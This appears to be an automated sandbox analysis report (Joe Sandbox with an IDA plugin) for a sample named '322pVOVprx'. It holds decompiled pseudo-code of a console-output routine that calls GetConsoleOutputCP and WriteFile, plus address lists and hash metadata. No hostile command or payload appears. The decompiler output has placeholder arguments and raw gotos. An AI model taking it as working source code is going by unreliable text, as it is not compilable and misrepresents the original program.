                                                                                                                                                                                                                                                        C-Code - Quality: 53%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5ACBA70(void* __eax, signed int __edx, void* __esi, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __r8) {
                                                                                                                                                                                                                                                        				void* __rdi;
                                                                                                                                                                                                                                                        				void* __rsi;
                                                                                                                                                                                                                                                        				void* __rbp;
                                                                                                                                                                                                                                                        				intOrPtr _t184;
                                                                                                                                                                                                                                                        				signed int _t188;
                                                                                                                                                                                                                                                        				signed int _t195;
                                                                                                                                                                                                                                                        				signed int _t200;
                                                                                                                                                                                                                                                        				intOrPtr _t209;
                                                                                                                                                                                                                                                        				void* _t211;
                                                                                                                                                                                                                                                        				signed char _t212;
                                                                                                                                                                                                                                                        				void* _t229;
                                                                                                                                                                                                                                                        				void* _t262;
                                                                                                                                                                                                                                                        				signed long long _t263;
                                                                                                                                                                                                                                                        				long long _t268;
                                                                                                                                                                                                                                                        				long long _t270;
                                                                                                                                                                                                                                                        				void* _t271;
                                                                                                                                                                                                                                                        				long long _t273;
                                                                                                                                                                                                                                                        				intOrPtr* _t279;
                                                                                                                                                                                                                                                        				intOrPtr* _t286;
                                                                                                                                                                                                                                                        				long long _t288;
                                                                                                                                                                                                                                                        				long long _t315;
                                                                                                                                                                                                                                                        				void* _t323;
                                                                                                                                                                                                                                                        				long long _t324;
                                                                                                                                                                                                                                                        				void* _t325;
                                                                                                                                                                                                                                                        				long long _t326;
                                                                                                                                                                                                                                                        				intOrPtr* _t327;
                                                                                                                                                                                                                                                        				long long _t328;
                                                                                                                                                                                                                                                        				signed char* _t329;
                                                                                                                                                                                                                                                        				signed char* _t330;
                                                                                                                                                                                                                                                        				signed char* _t331;
                                                                                                                                                                                                                                                        				void* _t332;
                                                                                                                                                                                                                                                        				void* _t333;
                                                                                                                                                                                                                                                        				void* _t334;
                                                                                                                                                                                                                                                        				signed long long _t335;
                                                                                                                                                                                                                                                        				intOrPtr _t338;
                                                                                                                                                                                                                                                        				intOrPtr _t341;
                                                                                                                                                                                                                                                        				void* _t343;
                                                                                                                                                                                                                                                        				signed long long _t345;
                                                                                                                                                                                                                                                        				signed long long _t347;
                                                                                                                                                                                                                                                        				long long _t356;
                                                                                                                                                                                                                                                        				void* _t360;
                                                                                                                                                                                                                                                        				long long _t361;
                                                                                                                                                                                                                                                        				signed long long _t364;
                                                                                                                                                                                                                                                        				char _t365;
                                                                                                                                                                                                                                                        				signed long long _t366;
                                                                                                                                                                                                                                                        				void* _t369;
                                                                                                                                                                                                                                                        				signed char* _t370;
                                                                                                                                                                                                                                                        				signed long long _t372;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t262 = _t334;
                                                                                                                                                                                                                                                        				_t333 = _t262 - 0x57;
                                                                                                                                                                                                                                                        				_t335 = _t334 - 0xd0;
                                                                                                                                                                                                                                                        				 *((long long*)(_t333 - 9)) = 0xfffffffe;
                                                                                                                                                                                                                                                        				 *((long long*)(_t262 + 8)) = __rbx;
                                                                                                                                                                                                                                                        				_t263 =  *0xe5aed018; // 0x33daea0d3843
                                                                                                                                                                                                                                                        				 *(_t333 + 0x17) = _t263 ^ _t335;
                                                                                                                                                                                                                                                        				_t327 = __r8;
                                                                                                                                                                                                                                                        				 *((long long*)(_t333 - 0x41)) = __r8;
                                                                                                                                                                                                                                                        				_t279 = __rcx;
                                                                                                                                                                                                                                                        				 *((long long*)(_t333 - 0x59)) =  *((intOrPtr*)(_t333 + 0x7f));
                                                                                                                                                                                                                                                        				_t364 = __edx >> 6;
                                                                                                                                                                                                                                                        				 *(_t333 - 0x39) = _t364;
                                                                                                                                                                                                                                                        				_t372 = __edx + __edx * 8;
                                                                                                                                                                                                                                                        				_t268 =  *((intOrPtr*)( *((intOrPtr*)(0x7ff6e5ab0000 + 0x4ca30 + _t364 * 8)) + 0x28 + _t372 * 8));
                                                                                                                                                                                                                                                        				 *((long long*)(_t333 - 0x19)) = _t268;
                                                                                                                                                                                                                                                        				r12d = r9d;
                                                                                                                                                                                                                                                        				_t361 = _t360 + __r8;
                                                                                                                                                                                                                                                        				 *((long long*)(_t333 - 0x61)) = _t361;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t333 - 0x49)) = GetConsoleOutputCP();
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)( *((intOrPtr*)(_t333 - 0x59)) + 0x28)) != dil) goto 0xe5acbb10;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC3A20(_t268, __rcx,  *((intOrPtr*)(_t333 - 0x59)), __r8);
                                                                                                                                                                                                                                                        				_t209 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t333 - 0x59)) + 0x18)) + 0xc));
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t333 - 0x45)) = _t209;
                                                                                                                                                                                                                                                        				 *_t279 = _t268;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t279 + 8)) = 0;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t333 - 0x41)) - _t361 >= 0) goto 0xe5acbebb;
                                                                                                                                                                                                                                                        				_t345 = __edx >> 6;
                                                                                                                                                                                                                                                        				 *(_t333 - 0x11) = _t345;
                                                                                                                                                                                                                                                        				 *((char*)(_t333 - 0x71)) =  *_t327;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t333 - 0x6d)) = 0;
                                                                                                                                                                                                                                                        				r12d = 1;
                                                                                                                                                                                                                                                        				if (_t209 != 0xfde9) goto 0xe5acbcd5;
                                                                                                                                                                                                                                                        				_t286 = 0x3e + _t372 * 8 +  *((intOrPtr*)(0x7ff6e5ab0000 + 0x4ca30 + _t345 * 8));
                                                                                                                                                                                                                                                        				if ( *_t286 == dil) goto 0xe5acbb82;
                                                                                                                                                                                                                                                        				_t369 = _t326 + 1;
                                                                                                                                                                                                                                                        				if (_t369 - 5 < 0) goto 0xe5acbb6f;
                                                                                                                                                                                                                                                        				if (_t369 <= 0) goto 0xe5acbc6b;
                                                                                                                                                                                                                                                        				r12d =  *((char*)(_t286 + 0x7ff6e5aed2e1));
                                                                                                                                                                                                                                                        				r12d = r12d + 1;
                                                                                                                                                                                                                                                        				_t184 = r12d - 1;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t333 - 0x51)) = _t184;
                                                                                                                                                                                                                                                        				_t338 = _t184;
                                                                                                                                                                                                                                                        				if (_t338 -  *((intOrPtr*)(_t333 - 0x61)) - _t327 > 0) goto 0xe5acbe38;
                                                                                                                                                                                                                                                        				_t288 = _t326;
                                                                                                                                                                                                                                                        				 *((char*)(_t333 + _t288 - 1)) =  *((intOrPtr*)(0x3e + _t372 * 8 +  *((intOrPtr*)(0x7ff6e5ab0000 + 0x4ca30 + _t345 * 8))));
                                                                                                                                                                                                                                                        				if (_t288 + 1 - _t369 < 0) goto 0xe5acbbd3;
                                                                                                                                                                                                                                                        				if (_t338 <= 0) goto 0xe5acbc03;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABBB60();
                                                                                                                                                                                                                                                        				_t356 =  *((intOrPtr*)(_t333 - 0x59));
                                                                                                                                                                                                                                                        				_t315 = _t326;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)( *((intOrPtr*)(0x7ff6e5ab0000 + 0x4ca30 + _t364 * 8)) + _t315 + 0x3e + _t372 * 8)) = dil;
                                                                                                                                                                                                                                                        				if (_t315 + 1 - _t369 < 0) goto 0xe5acbc06;
                                                                                                                                                                                                                                                        				 *((long long*)(_t333 - 0x31)) = _t326;
                                                                                                                                                                                                                                                        				_t270 = _t333 - 1;
                                                                                                                                                                                                                                                        				 *((long long*)(_t333 - 0x29)) = _t270;
                                                                                                                                                                                                                                                        				_t188 = (0 | r12d == 0x00000004) + 1;
                                                                                                                                                                                                                                                        				r12d = _t188;
                                                                                                                                                                                                                                                        				r8d = _t188;
                                                                                                                                                                                                                                                        				 *((long long*)(_t335 + 0x20)) = _t356;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ACF57C(_t270, _t279, _t333 - 0x6d, _t333 - 0x29, _t338, _t333 - 0x31);
                                                                                                                                                                                                                                                        				if (_t270 == 0xffffffff) goto 0xe5acbebb;
                                                                                                                                                                                                                                                        				_t328 = _t327 +  *((intOrPtr*)(_t333 - 0x51)) - 1;
                                                                                                                                                                                                                                                        				goto 0xe5acbd66;
                                                                                                                                                                                                                                                        				_t365 =  *((char*)(_t270 + 0x7ff6e5aed2e0));
                                                                                                                                                                                                                                                        				_t211 = _t365 + 1;
                                                                                                                                                                                                                                                        				_t271 = _t211;
                                                                                                                                                                                                                                                        				if (_t271 -  *((intOrPtr*)(_t333 - 0x61)) - _t328 > 0) goto 0xe5acbe66;
                                                                                                                                                                                                                                                        				 *((long long*)(_t333 - 0x51)) = _t326;
                                                                                                                                                                                                                                                        				 *((long long*)(_t333 - 0x21)) = _t328;
                                                                                                                                                                                                                                                        				_t195 = (0 | _t211 == 0x00000004) + 1;
                                                                                                                                                                                                                                                        				r14d = _t195;
                                                                                                                                                                                                                                                        				r8d = _t195;
                                                                                                                                                                                                                                                        				 *((long long*)(_t335 + 0x20)) = _t356;
                                                                                                                                                                                                                                                        				_t347 = _t333 - 0x51;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ACF57C(_t271, _t279, _t333 - 0x6d, _t333 - 0x21,  *((intOrPtr*)(_t333 - 0x61)) - _t328, _t347);
                                                                                                                                                                                                                                                        				if (_t271 == 0xffffffff) goto 0xe5acbebb;
                                                                                                                                                                                                                                                        				_t329 = _t328 + _t365;
                                                                                                                                                                                                                                                        				r12d = r14d;
                                                                                                                                                                                                                                                        				_t366 =  *(_t333 - 0x39);
                                                                                                                                                                                                                                                        				goto 0xe5acbd66;
                                                                                                                                                                                                                                                        				_t341 =  *((intOrPtr*)(0x7ff6e5ab0000 + 0x4ca30 + _t366 * 8));
                                                                                                                                                                                                                                                        				_t212 =  *(_t341 + 0x3d + _t372 * 8);
                                                                                                                                                                                                                                                        				if ((_t212 & 0x00000004) == 0) goto 0xe5acbd08;
                                                                                                                                                                                                                                                        				 *((char*)(_t333 + 7)) =  *((intOrPtr*)(_t341 + 0x3e + _t372 * 8));
                                                                                                                                                                                                                                                        				 *((char*)(_t333 + 8)) =  *_t329;
                                                                                                                                                                                                                                                        				 *(_t341 + 0x3d + _t372 * 8) = _t212 & 0x000000fb;
                                                                                                                                                                                                                                                        				r8d = 2;
                                                                                                                                                                                                                                                        				goto 0xe5acbd51;
                                                                                                                                                                                                                                                        				r9d =  *_t329 & 0x000000ff;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t356 + 0x18)))) + _t347 * 2)) >= 0) goto 0xe5acbd4b;
                                                                                                                                                                                                                                                        				_t370 =  &(_t329[1]);
                                                                                                                                                                                                                                                        				if (_t370 -  *((intOrPtr*)(_t333 - 0x61)) >= 0) goto 0xe5acbe98;
                                                                                                                                                                                                                                                        				r8d = 2;
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5ACDBB0(_t212 & 0x000000fb, _t229, _t279, _t333 - 0x6d, _t329, _t326, _t329, _t333, _t341, _t356) == 0xffffffff) goto 0xe5acbebb;
                                                                                                                                                                                                                                                        				_t330 = _t370;
                                                                                                                                                                                                                                                        				goto 0xe5acbd66;
                                                                                                                                                                                                                                                        				_t200 = E00007FF67FF6E5ACDBB0(_t212 & 0x000000fb, _t229, _t279, _t333 - 0x6d, _t330, _t326, _t330, _t333, _t361, _t356);
                                                                                                                                                                                                                                                        				if (_t200 == 0xffffffff) goto 0xe5acbebb;
                                                                                                                                                                                                                                                        				_t331 =  &(_t330[1]);
                                                                                                                                                                                                                                                        				 *((long long*)(_t335 + 0x38)) = _t326;
                                                                                                                                                                                                                                                        				 *((long long*)(_t335 + 0x30)) = _t326;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t335 + 0x28)) = 5;
                                                                                                                                                                                                                                                        				_t273 = _t333 + 0xf;
                                                                                                                                                                                                                                                        				 *((long long*)(_t335 + 0x20)) = _t273;
                                                                                                                                                                                                                                                        				r9d = r12d;
                                                                                                                                                                                                                                                        				_t343 = _t333 - 0x6d;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ACF0B8();
                                                                                                                                                                                                                                                        				r14d = _t200;
                                                                                                                                                                                                                                                        				if (_t200 == 0) goto 0xe5acbebb;
                                                                                                                                                                                                                                                        				 *((long long*)(_t335 + 0x20)) = _t326;
                                                                                                                                                                                                                                                        				r8d = _t200;
                                                                                                                                                                                                                                                        				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0xe5acbeb3;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t279 + 4)) = __esi -  *((intOrPtr*)(_t333 - 0x41)) +  *((intOrPtr*)(_t279 + 8));
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t333 - 0x69)) - r14d < 0) goto 0xe5acbebb;
                                                                                                                                                                                                                                                        				if ( *((char*)(_t333 - 0x71)) != 0xa) goto 0xe5acbe1e;
                                                                                                                                                                                                                                                        				 *((short*)(_t333 - 0x71)) = 0xd;
                                                                                                                                                                                                                                                        				 *((long long*)(_t335 + 0x20)) = _t326;
                                                                                                                                                                                                                                                        				_t130 = _t273 - 0xc; // 0x1
                                                                                                                                                                                                                                                        				r8d = _t130;
                                                                                                                                                                                                                                                        				_t323 = _t333 - 0x71;
                                                                                                                                                                                                                                                        				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0xe5acbeb3;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t333 - 0x69)) - 1 < 0) goto 0xe5acbebb;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t279 + 8)) =  *((intOrPtr*)(_t279 + 8)) + 1;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t279 + 4)) =  *((intOrPtr*)(_t279 + 4)) + 1;
                                                                                                                                                                                                                                                        				if (_t331 -  *((intOrPtr*)(_t333 - 0x61)) >= 0) goto 0xe5acbebb;
                                                                                                                                                                                                                                                        				goto 0xe5acbb39;
                                                                                                                                                                                                                                                        				if (_t323 <= 0) goto 0xe5acbe61;
                                                                                                                                                                                                                                                        				_t332 = _t331 - _t370;
                                                                                                                                                                                                                                                        				 *((char*)( *((intOrPtr*)(0x7ff6e5ab0000 + 0x4ca30 + _t366 * 8)) + _t370 + 0x3e + _t372 * 8)) =  *((intOrPtr*)(_t332 + _t370));
                                                                                                                                                                                                                                                        				if (1 - _t323 < 0) goto 0xe5acbe40;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t279 + 4)) =  *((intOrPtr*)(_t279 + 4)) +  *((intOrPtr*)(_t279 + 4));
                                                                                                                                                                                                                                                        				goto 0xe5acbebb;
                                                                                                                                                                                                                                                        				if (_t343 <= 0) goto 0xe5acbe92;
                                                                                                                                                                                                                                                        				_t324 = _t326;
                                                                                                                                                                                                                                                        				 *((char*)( *((intOrPtr*)(0x7ff6e5ab0000 + 0x4ca30 +  *(_t333 - 0x39) * 8)) + _t324 + 0x3e + _t372 * 8)) =  *((intOrPtr*)(_t324 + _t332));
                                                                                                                                                                                                                                                        				_t325 = _t324 + 1;
                                                                                                                                                                                                                                                        				if (2 - _t343 < 0) goto 0xe5acbe72;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t279 + 4)) =  *((intOrPtr*)(_t279 + 4)) + r8d;
                                                                                                                                                                                                                                                        				goto 0xe5acbebb;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t343 + 0x3e + _t372 * 8)) = r9b;
                                                                                                                                                                                                                                                        				 *( *((intOrPtr*)(0x7ff6e5ab0000 + 0x4ca30 + _t366 * 8)) + 0x3d + _t372 * 8) =  *( *((intOrPtr*)(0x7ff6e5ab0000 + 0x4ca30 + _t366 * 8)) + 0x3d + _t372 * 8) | 0x00000004;
                                                                                                                                                                                                                                                        				_t173 = _t325 + 1; // 0x1
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t279 + 4)) = _t173;
                                                                                                                                                                                                                                                        				goto 0xe5acbebb;
                                                                                                                                                                                                                                                        				 *_t279 = GetLastError();
                                                                                                                                                                                                                                                        				return E00007FF67FF6E5ABAD80(_t207,  *((intOrPtr*)(_t333 - 0x45)),  *(_t333 + 0x17) ^ _t335);
                                                                                                                                                                                                                                                        			}



















































                                                                                                                                                                                                                                                        0x7ff6e5acba70
                                                                                                                                                                                                                                                        0x7ff6e5acba7e
                                                                                                                                                                                                                                                        0x7ff6e5acba82
                                                                                                                                                                                                                                                        0x7ff6e5acba89
                                                                                                                                                                                                                                                        0x7ff6e5acba91
                                                                                                                                                                                                                                                        0x7ff6e5acba95
                                                                                                                                                                                                                                                        0x7ff6e5acba9f
                                                                                                                                                                                                                                                        0x7ff6e5acbaa3
                                                                                                                                                                                                                                                        0x7ff6e5acbaa6
                                                                                                                                                                                                                                                        0x7ff6e5acbaad
                                                                                                                                                                                                                                                        0x7ff6e5acbab4
                                                                                                                                                                                                                                                        0x7ff6e5acbabe
                                                                                                                                                                                                                                                        0x7ff6e5acbac2
                                                                                                                                                                                                                                                        0x7ff6e5acbad0
                                                                                                                                                                                                                                                        0x7ff6e5acbadc
                                                                                                                                                                                                                                                        0x7ff6e5acbae1
                                                                                                                                                                                                                                                        0x7ff6e5acbae5
                                                                                                                                                                                                                                                        0x7ff6e5acbae8
                                                                                                                                                                                                                                                        0x7ff6e5acbaeb
                                                                                                                                                                                                                                                        0x7ff6e5acbaf5
                                                                                                                                                                                                                                                        0x7ff6e5acbb02
                                                                                                                                                                                                                                                        0x7ff6e5acbb07
                                                                                                                                                                                                                                                        0x7ff6e5acbb14
                                                                                                                                                                                                                                                        0x7ff6e5acbb17
                                                                                                                                                                                                                                                        0x7ff6e5acbb1c
                                                                                                                                                                                                                                                        0x7ff6e5acbb1f
                                                                                                                                                                                                                                                        0x7ff6e5acbb26
                                                                                                                                                                                                                                                        0x7ff6e5acbb2f
                                                                                                                                                                                                                                                        0x7ff6e5acbb33
                                                                                                                                                                                                                                                        0x7ff6e5acbb3b
                                                                                                                                                                                                                                                        0x7ff6e5acbb3e
                                                                                                                                                                                                                                                        0x7ff6e5acbb41
                                                                                                                                                                                                                                                        0x7ff6e5acbb54
                                                                                                                                                                                                                                                        0x7ff6e5acbb67
                                                                                                                                                                                                                                                        0x7ff6e5acbb72
                                                                                                                                                                                                                                                        0x7ff6e5acbb76
                                                                                                                                                                                                                                                        0x7ff6e5acbb80
                                                                                                                                                                                                                                                        0x7ff6e5acbb85
                                                                                                                                                                                                                                                        0x7ff6e5acbb99
                                                                                                                                                                                                                                                        0x7ff6e5acbba2
                                                                                                                                                                                                                                                        0x7ff6e5acbba8
                                                                                                                                                                                                                                                        0x7ff6e5acbbaa
                                                                                                                                                                                                                                                        0x7ff6e5acbbb4
                                                                                                                                                                                                                                                        0x7ff6e5acbbba
                                                                                                                                                                                                                                                        0x7ff6e5acbbc0
                                                                                                                                                                                                                                                        0x7ff6e5acbbd5
                                                                                                                                                                                                                                                        0x7ff6e5acbbe2
                                                                                                                                                                                                                                                        0x7ff6e5acbbe7
                                                                                                                                                                                                                                                        0x7ff6e5acbbf3
                                                                                                                                                                                                                                                        0x7ff6e5acbbf8
                                                                                                                                                                                                                                                        0x7ff6e5acbc03
                                                                                                                                                                                                                                                        0x7ff6e5acbc11
                                                                                                                                                                                                                                                        0x7ff6e5acbc1c
                                                                                                                                                                                                                                                        0x7ff6e5acbc1e
                                                                                                                                                                                                                                                        0x7ff6e5acbc22
                                                                                                                                                                                                                                                        0x7ff6e5acbc26
                                                                                                                                                                                                                                                        0x7ff6e5acbc33
                                                                                                                                                                                                                                                        0x7ff6e5acbc35
                                                                                                                                                                                                                                                        0x7ff6e5acbc38
                                                                                                                                                                                                                                                        0x7ff6e5acbc3b
                                                                                                                                                                                                                                                        0x7ff6e5acbc4c
                                                                                                                                                                                                                                                        0x7ff6e5acbc55
                                                                                                                                                                                                                                                        0x7ff6e5acbc63
                                                                                                                                                                                                                                                        0x7ff6e5acbc66
                                                                                                                                                                                                                                                        0x7ff6e5acbc6e
                                                                                                                                                                                                                                                        0x7ff6e5acbc77
                                                                                                                                                                                                                                                        0x7ff6e5acbc82
                                                                                                                                                                                                                                                        0x7ff6e5acbc88
                                                                                                                                                                                                                                                        0x7ff6e5acbc8e
                                                                                                                                                                                                                                                        0x7ff6e5acbc92
                                                                                                                                                                                                                                                        0x7ff6e5acbc9e
                                                                                                                                                                                                                                                        0x7ff6e5acbca0
                                                                                                                                                                                                                                                        0x7ff6e5acbca3
                                                                                                                                                                                                                                                        0x7ff6e5acbca6
                                                                                                                                                                                                                                                        0x7ff6e5acbcab
                                                                                                                                                                                                                                                        0x7ff6e5acbcb7
                                                                                                                                                                                                                                                        0x7ff6e5acbcc0
                                                                                                                                                                                                                                                        0x7ff6e5acbcc6
                                                                                                                                                                                                                                                        0x7ff6e5acbcc9
                                                                                                                                                                                                                                                        0x7ff6e5acbccc
                                                                                                                                                                                                                                                        0x7ff6e5acbcd0
                                                                                                                                                                                                                                                        0x7ff6e5acbcd5
                                                                                                                                                                                                                                                        0x7ff6e5acbcdd
                                                                                                                                                                                                                                                        0x7ff6e5acbce5
                                                                                                                                                                                                                                                        0x7ff6e5acbcec
                                                                                                                                                                                                                                                        0x7ff6e5acbcf1
                                                                                                                                                                                                                                                        0x7ff6e5acbcf7
                                                                                                                                                                                                                                                        0x7ff6e5acbcfc
                                                                                                                                                                                                                                                        0x7ff6e5acbd06
                                                                                                                                                                                                                                                        0x7ff6e5acbd08
                                                                                                                                                                                                                                                        0x7ff6e5acbd18
                                                                                                                                                                                                                                                        0x7ff6e5acbd1a
                                                                                                                                                                                                                                                        0x7ff6e5acbd22
                                                                                                                                                                                                                                                        0x7ff6e5acbd2b
                                                                                                                                                                                                                                                        0x7ff6e5acbd40
                                                                                                                                                                                                                                                        0x7ff6e5acbd46
                                                                                                                                                                                                                                                        0x7ff6e5acbd49
                                                                                                                                                                                                                                                        0x7ff6e5acbd58
                                                                                                                                                                                                                                                        0x7ff6e5acbd60
                                                                                                                                                                                                                                                        0x7ff6e5acbd66
                                                                                                                                                                                                                                                        0x7ff6e5acbd69
                                                                                                                                                                                                                                                        0x7ff6e5acbd6e
                                                                                                                                                                                                                                                        0x7ff6e5acbd73
                                                                                                                                                                                                                                                        0x7ff6e5acbd7b
                                                                                                                                                                                                                                                        0x7ff6e5acbd7f
                                                                                                                                                                                                                                                        0x7ff6e5acbd84
                                                                                                                                                                                                                                                        0x7ff6e5acbd87
                                                                                                                                                                                                                                                        0x7ff6e5acbd90
                                                                                                                                                                                                                                                        0x7ff6e5acbd95
                                                                                                                                                                                                                                                        0x7ff6e5acbd9a
                                                                                                                                                                                                                                                        0x7ff6e5acbda0
                                                                                                                                                                                                                                                        0x7ff6e5acbda9
                                                                                                                                                                                                                                                        0x7ff6e5acbdbf
                                                                                                                                                                                                                                                        0x7ff6e5acbdcd
                                                                                                                                                                                                                                                        0x7ff6e5acbdd4
                                                                                                                                                                                                                                                        0x7ff6e5acbdde
                                                                                                                                                                                                                                                        0x7ff6e5acbde5
                                                                                                                                                                                                                                                        0x7ff6e5acbde9
                                                                                                                                                                                                                                                        0x7ff6e5acbdf2
                                                                                                                                                                                                                                                        0x7ff6e5acbdf2
                                                                                                                                                                                                                                                        0x7ff6e5acbdf6
                                                                                                                                                                                                                                                        0x7ff6e5acbe05
                                                                                                                                                                                                                                                        0x7ff6e5acbe0f
                                                                                                                                                                                                                                                        0x7ff6e5acbe15
                                                                                                                                                                                                                                                        0x7ff6e5acbe18
                                                                                                                                                                                                                                                        0x7ff6e5acbe22
                                                                                                                                                                                                                                                        0x7ff6e5acbe33
                                                                                                                                                                                                                                                        0x7ff6e5acbe3b
                                                                                                                                                                                                                                                        0x7ff6e5acbe3d
                                                                                                                                                                                                                                                        0x7ff6e5acbe4f
                                                                                                                                                                                                                                                        0x7ff6e5acbe5f
                                                                                                                                                                                                                                                        0x7ff6e5acbe61
                                                                                                                                                                                                                                                        0x7ff6e5acbe64
                                                                                                                                                                                                                                                        0x7ff6e5acbe69
                                                                                                                                                                                                                                                        0x7ff6e5acbe6b
                                                                                                                                                                                                                                                        0x7ff6e5acbe80
                                                                                                                                                                                                                                                        0x7ff6e5acbe87
                                                                                                                                                                                                                                                        0x7ff6e5acbe90
                                                                                                                                                                                                                                                        0x7ff6e5acbe92
                                                                                                                                                                                                                                                        0x7ff6e5acbe96
                                                                                                                                                                                                                                                        0x7ff6e5acbe98
                                                                                                                                                                                                                                                        0x7ff6e5acbea5
                                                                                                                                                                                                                                                        0x7ff6e5acbeab
                                                                                                                                                                                                                                                        0x7ff6e5acbeae
                                                                                                                                                                                                                                                        0x7ff6e5acbeb1
                                                                                                                                                                                                                                                        0x7ff6e5acbeb9
                                                                                                                                                                                                                                                        0x7ff6e5acbee4

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2718003287-0
                                                                                                                                                                                                                                                        • Opcode ID: f750311aff661a04a86bbbada4284786bf27b8065a17484a8f486471230e888d
                                                                                                                                                                                                                                                        • Instruction ID: b50f547c801871c8dbf29fc31201093e227ab83712af9b23459dc17b2e7b1023
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f750311aff661a04a86bbbada4284786bf27b8065a17484a8f486471230e888d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E0D1E233B18A8889E711CF69D4502AC3761EF05F98B504225CE4EDBB99DF3AD806C709
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1956198572-0
                                                                                                                                                                                                                                                        • Opcode ID: 162ef6909b0da24e61350fefbcaa0130b5f771c4d53ef42d88aea1c24daf7f6c
                                                                                                                                                                                                                                                        • Instruction ID: 4cd17c32f0a35356e278afd5309ba9d32f1566d11bb1ed5ce00c9e4ef67db39f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 162ef6909b0da24e61350fefbcaa0130b5f771c4d53ef42d88aea1c24daf7f6c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5211C633F1814642F690AB6DE5543B922A2EF89F80F444031ED49C6B8DCE3EDC818649
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 58%
